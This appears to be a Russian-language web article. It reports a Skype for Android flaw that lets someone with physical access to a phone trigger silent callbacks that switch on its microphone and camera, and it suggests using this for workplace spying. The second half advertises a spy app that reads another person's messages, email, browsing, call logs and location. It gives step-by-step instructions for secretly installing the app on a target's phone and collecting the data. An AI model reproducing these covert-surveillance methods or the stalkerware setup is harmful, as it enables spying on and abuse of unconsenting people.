Критическая уязвимость Skype позволяет шпионить за пользователями

8ee3b3737a3d4369e9520718742a5ad2

Как сообщил в блоге один из пользователей Reddit, декабрьское обновление Skype для платформы Android содержит ряд критических ошибок. Возникает подозрение, что эти бреши были оставлены создателями программы намеренно. Уязвимости в ПК-версиях не встречаются, но и пользователей Android миллионы по всему миру. Поэтому шпионаж может осуществляться за огромным количеством лиц. В отчёте детально рассматриваются способы использования таких уязвимостей. Никаких особых хакерских навыков здесь не требуется, а обнаружена брешь была совершенно случайно, во время общения двух участников Reddit.

Пользователь под ником Ponkers уже направило официальное обращении в корпорацию Microsoft, ведётся устранение бреши. Для того, чтобы с первого смартфона шпионить за вторым, потребуется две одинаковые учётные записи на обоих устройствах. Достаточно позвонить с первого на второе, а затем разорвать соединение. Если скрыть ярлык приложения, то владелец телефона-жертвы ничего и не увидит. После разрыва соединения программа будет перезванивать на первый аппарат автоматически. Аналогичные действия можно проделать, если поставить в настройках режим полёта в самолёте. В этом случае Skype иногда сам соединяется с сетью LTE, дабы завершить звонок.

Во время автоматического перезвона на смартфоне активируется микрофон и камера, но этого очень легко не заметить. Брешь может активно использоваться в промышленном шпионаже, при отслеживании действий начальства и подчинённых. Нужно лишь предварительно настроить учётную записи по одинаковым данным, поэтому потребуется физический доступ ко второму мобильному телефону. Официальные лица Microsoft обещают выпустить заплатку в самое ближайшее время.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.